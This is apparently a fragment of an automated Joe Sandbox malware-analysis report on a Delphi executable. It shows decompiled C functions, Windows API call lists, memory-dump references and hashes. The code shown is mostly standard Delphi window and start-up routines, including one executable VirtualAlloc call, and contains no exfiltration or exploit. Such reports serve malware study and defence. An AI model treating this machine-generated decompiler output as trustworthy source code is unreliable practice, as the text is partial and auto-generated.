                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindResource
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1635176832-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E004598AC(intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                                                                                                                                                                                                            				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                                                                                                                                                                                                            				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                                                                                                                                                                                                            				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                                                                                                                                                                                                            				_push(_t26); // executed
                                                                                                                                                                                                                            				L00407540(); // executed
                                                                                                                                                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                                                                                                                                                                                                            				return _t26;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4255912815-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 42%
                                                                                                                                                                                                                            			E004593B4(void* __eax, void* __ebx, void* __ecx) {
                                                                                                                                                                                                                            				struct _WNDCLASSA _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				char* _t22;
                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t27;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				CHAR* _t40;
                                                                                                                                                                                                                            				struct HWND__* _t41;
                                                                                                                                                                                                                            				char* _t47;
                                                                                                                                                                                                                            				char* _t52;
                                                                                                                                                                                                                            				long _t55;
                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t62;
                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				struct HMENU__* _t70;
                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				short _t88;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v48 = 0;
                                                                                                                                                                                                                            				_t69 = __eax;
                                                                                                                                                                                                                            				_push(_t83);
                                                                                                                                                                                                                            				_push(0x459555);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
	 *[fs:eax] = _t83 + 0xffffffd4;
	if( *((char*)(__eax + 0xa4)) != 0) {
		L13:
		_pop(_t77);
		 *[fs:eax] = _t77;
		_push(0x45955c);
		return E004049C0( &_v48);
	}
	_t22 =  *0x49dc84; // 0x49e04c
	if( *_t22 != 0) {
		goto L13;
	}
	_t23 = E00422BCC(E00459934, __eax); // executed
	 *(_t69 + 0x40) = _t23;
	 *0x49bf54 = L00407540;
	_t26 =  *0x49bf74; // 0x45909c
	_t27 =  *0x49e668; // 0x400000
	if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
		_t62 =  *0x49e668; // 0x400000
		 *0x49bf60 = _t62;
		_t88 = RegisterClassA(0x49bf50);
		if(_t88 == 0) {
			_t64 =  *0x49d7fc; // 0x422f20
			E00406A70(_t64,  &_v48);
			E0040D144(_v48, 1);
			E00404378();
		}
	}
	_t29 =  *0x49d970; // 0x49e900
	_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
	if(_t88 < 0) {
		asm("adc eax, 0x0");
	}
	_t33 =  *0x49d970; // 0x49e900
	_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
	if(_t88 < 0) {
		asm("adc eax, 0x0");
	}
	_push(_t36);
	_push(0);
	_push(0);
	_push(0);
	_push(0);
	_t37 =  *0x49e668; // 0x400000
	_push(_t37);
	_push(0);
	_t7 = _t69 + 0x8c; // 0x96000045
	_t39 = E00404E80( *_t7);
	_t40 =  *0x49bf74; // 0x45909c, executed
	_t41 = E00407AE4(_t40, _t39); // executed
	 *(_t69 + 0x30) = _t41;
	_t9 = _t69 + 0x8c; // 0x45150c
	E004049C0(_t9);
	 *((char*)(_t69 + 0xa4)) = 1;
	_t11 = _t69 + 0x40; // 0x10940000
	_t12 = _t69 + 0x30; // 0xe
	SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
	_t47 =  *0x49da40; // 0x49eb1c
	if( *_t47 != 0) {
		_t55 = E0045A038(_t69);
		_t13 = _t69 + 0x30; // 0xe
		SendMessageA( *_t13, 0x80, 1, _t55); // executed
		_t59 = E0045A038(_t69);
		_t14 = _t69 + 0x30; // 0xe
		SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
	}
	_t15 = _t69 + 0x30; // 0xe
	_t70 = GetSystemMenu( *_t15, "true");
	DeleteMenu(_t70, 0xf030, 0);
	DeleteMenu(_t70, 0xf000, 0);
	_t52 =  *0x49da40; // 0x49eb1c
	if( *_t52 != 0) {
		DeleteMenu(_t70, 0xf010, 0);
	}
	goto L13;
}
                                                                                                                                                                                                                            0x00459530
                                                                                                                                                                                                                            0x0045953a
                                                                                                                                                                                                                            0x0045953a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                                                                                                                                                                                            • GetClassInfoA.USER32 ref: 00459413
                                                                                                                                                                                                                            • RegisterClassA.USER32 ref: 0045942B
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 004594C7
                                                                                                                                                                                                                            • SendMessageA.USER32 ref: 004594E9
                                                                                                                                                                                                                            • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                                                                                                                                                                                            • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                                                                                                                                            • String ID: /B$@u@$LI
                                                                                                                                                                                                                            • API String ID: 2103932818-2136969242
                                                                                                                                                                                                                            • Opcode ID: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                                                                                                                                                                                            • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00446330(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				short _t27;
                                                                                                                                                                                                                            				char _t29;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				intOrPtr* _t50;
                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t63;
                                                                                                                                                                                                                            				intOrPtr* _t78;
                                                                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_push(_t87);
                                                                                                                                                                                                                            				_push(0x4464a8);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t87 + 0xffffffe0;
                                                                                                                                                                                                                            				_v16 = GetCurrentProcessId();
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
                                                                                                                                                                                                                            				E00404A14(0x49eb28, _v8);
                                                                                                                                                                                                                            				_t25 =  *0x49eb28; // 0x0
                                                                                                                                                                                                                            				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
                                                                                                                                                                                                                            				 *0x49eb24 = _t27;
                                                                                                                                                                                                                            				_t29 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_v36 = _t29;
                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                            				_v28 = GetCurrentThreadId();
                                                                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                                                                            				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                                                                                                                                                                                            				E00404A14(0x49eb2c, _v20);
                                                                                                                                                                                                                            				_t35 =  *0x49eb2c; // 0x0
                                                                                                                                                                                                                            				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
                                                                                                                                                                                                                            				_t38 =  *0x49eb2c; // 0x0
                                                                                                                                                                                                                            				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
                                                                                                                                                                                                                            				 *0x49eb68 = E0041AF14(1);
                                                                                                                                                                                                                            				E00445F34();
                                                                                                                                                                                                                            				 *0x49eb18 = E00445D5C(1, 1);
                                                                                                                                                                                                                            				_t47 = E00457FC8(1, __edi);
                                                                                                                                                                                                                            				_t78 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            				 *_t78 = _t47;
                                                                                                                                                                                                                            				_t49 = E004590AC(0, 1);
                                                                                                                                                                                                                            				_t80 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            				 *_t80 = _t49;
                                                                                                                                                                                                                            				_t50 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            				E0045AD24( *_t50, 1);
                                                                                                                                                                                                                            				_t53 =  *0x435da8; // 0x435dac
                                                                                                                                                                                                                            				E0041A634(_t53, 0x43807c, 0x43808c);
                                                                                                                                                                                                                            				_t63 = GetModuleHandleA("USER32");
                                                                                                                                                                                                                            				if(_t63 != 0) {
                                                                                                                                                                                                                            					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t83);
                                                                                                                                                                                                                            				 *[fs:eax] = _t83;
                                                                                                                                                                                                                            				_push(0x4464af);
                                                                                                                                                                                                                            				E004049C0( &_v20);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                            0x004463c5
                                                                                                                                                                                                                            0x004463ca
                                                                                                                                                                                                                            0x004463da
                                                                                                                                                                                                                            0x004463e0
                                                                                                                                                                                                                            0x004463f0
                                                                                                                                                                                                                            0x00446401
                                                                                                                                                                                                                            0x00446406
                                                                                                                                                                                                                            0x00446417
                                                                                                                                                                                                                            0x00446425
                                                                                                                                                                                                                            0x0044642a
                                                                                                                                                                                                                            0x00446430
                                                                                                                                                                                                                            0x0044643b
                                                                                                                                                                                                                            0x00446440
                                                                                                                                                                                                                            0x00446446
                                                                                                                                                                                                                            0x00446448
                                                                                                                                                                                                                            0x00446451
                                                                                                                                                                                                                            0x00446460
                                                                                                                                                                                                                            0x00446465
                                                                                                                                                                                                                            0x00446474
                                                                                                                                                                                                                            0x00446478
                                                                                                                                                                                                                            0x00446485
                                                                                                                                                                                                                            0x00446485
                                                                                                                                                                                                                            0x0044648c
                                                                                                                                                                                                                            0x0044648f
                                                                                                                                                                                                                            0x00446492
                                                                                                                                                                                                                            0x0044649a
                                                                                                                                                                                                                            0x004464a7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                                                            • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                                                              • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                                                                                                                                                                                              • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                                                              • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                                                              • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: GetKeyboardLayout.USER32 ref: 0045800D
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9AC50.USER32(00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?), ref: 00458077
                                                                                                                                                                                                                              • Part of subcall function 004590AC: LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                                                              • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                                                              • Part of subcall function 004590AC: OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                                                              • Part of subcall function 004590AC: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00459216
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                                                                                                                                                                            • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                                                                                                                                                                                            • API String ID: 2159221912-974380857
                                                                                                                                                                                                                            • Opcode ID: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                                                                                                                                                                                            • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 300 43e6bc-43e6f3 302 43e6f5-43e6fc 300->302 303 43e768-43e78d GetClassInfoA 300->303 302->303 306 43e6fe-43e703 302->306 304 43e78f-43e79a 303->304 305 43e79c-43e79e 303->305 304->305 307 43e7cd-43e7ea call 43e88c 304->307 308 43e7a0-43e7a8 UnregisterClassA 305->308 309 43e7ad-43e7c6 RegisterClassA 305->309 310 43e705-43e709 306->310 311 43e728-43e763 call 406a70 call 40d180 call 404378 306->311 319 43e7f1-43e804 GetWindowLongA 307->319 320 43e7ec call 40e79c 307->320 308->309 309->307 314 43e7c8 call 40e79c 309->314 310->311 313 43e70b-43e71a call 403d78 310->313 311->303 313->311 327 43e71c-43e726 call 441704 313->327 314->307 324 43e827-43e84e call 40a1d4 call 441a14 call 424e24 call 43c130 319->324 325 43e806-43e816 GetWindowLongA 319->325 320->319 339 43e853-43e857 324->339 325->324 329 43e818-43e822 SetWindowLongA 325->329 327->303 329->324 340 43e864-43e87c call 4049c0 339->340 341 43e859-43e85f call 403de8 339->341 341->340
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				struct _WNDCLASSA _v108;
                                                                                                                                                                                                                            				intOrPtr _v116;
                                                                                                                                                                                                                            				signed char _v137;
                                                                                                                                                                                                                            				void* _v144;
                                                                                                                                                                                                                            				struct _WNDCLASSA _v184;
                                                                                                                                                                                                                            				char _v188;
                                                                                                                                                                                                                            				char _v192;
                                                                                                                                                                                                                            				char _v196;
                                                                                                                                                                                                                            				int _t52;
                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr _t104;
                                                                                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                            				intOrPtr* _t111;
                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t109 = __edi;
                                                                                                                                                                                                                            				_t94 = __ebx;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_v196 = 0;
                                                                                                                                                                                                                            				_t111 = __eax;
                                                                                                                                                                                                                            				_push(_t115);
                                                                                                                                                                                                                            				_push(0x43e87d);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t115 + 0xffffff40;
                                                                                                                                                                                                                            				_t95 =  *__eax;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *__eax + 0x98))();
                                                                                                                                                                                                                            				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
                                                                                                                                                                                                                            					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                            					_t53 = _t52 + 1;
                                                                                                                                                                                                                            					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
                                                                                                                                                                                                                            						if(_t53 != 0) {
                                                                                                                                                                                                                            							UnregisterClassA( &_v68, _v108.hInstance);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v108.lpfnWndProc = E00437D70;
                                                                                                                                                                                                                            						_v108.lpszClassName =  &_v68;
                                                                                                                                                                                                                            						if(RegisterClassA( &_v108) == 0) {
                                                                                                                                                                                                                            							E0040E79C(_t94, _t95, _t109, _t111);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *0x49bc20 = _t111;
                                                                                                                                                                                                                            					_t96 =  *_t111; // executed
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t111 + 0x9c))();
                                                                                                                                                                                                                            					if( *(_t111 + 0x180) == 0) {
                                                                                                                                                                                                                            						E0040E79C(_t94, _t96, _t109, _t111);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
                                                                                                                                                                                                                            						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t111 + 0x64)) = 0;
                                                                                                                                                                                                                            					E00441A14(_t111);
                                                                                                                                                                                                                            					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
                                                                                                                                                                                                                            					_t130 =  *((char*)(_t111 + 0x5c));
                                                                                                                                                                                                                            					if( *((char*)(_t111 + 0x5c)) != 0) {
                                                                                                                                                                                                                            						E00403DE8(_t111, _t130);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t104);
                                                                                                                                                                                                                            					 *[fs:eax] = _t104;
                                                                                                                                                                                                                            					_push(0x43e884);
                                                                                                                                                                                                                            					return E004049C0( &_v196);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t94 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                            					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                            						_v192 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                                            						_v188 = 0xb;
                                                                                                                                                                                                                            						_t86 =  *0x49dc4c; // 0x422f30
                                                                                                                                                                                                                            						E00406A70(_t86,  &_v196);
                                                                                                                                                                                                                            						_t95 = _v196;
                                                                                                                                                                                                                            						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t108 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						if(E00403D78(_t94, _t108) == 0) {
                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v116 = E00441704(_t94);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                                                                                                                                            • String ID: 0/B$@$tC
                                                                                                                                                                                                                            • API String ID: 717780171-775952512
                                                                                                                                                                                                                            • Opcode ID: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                                                                                                                                                                                            • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
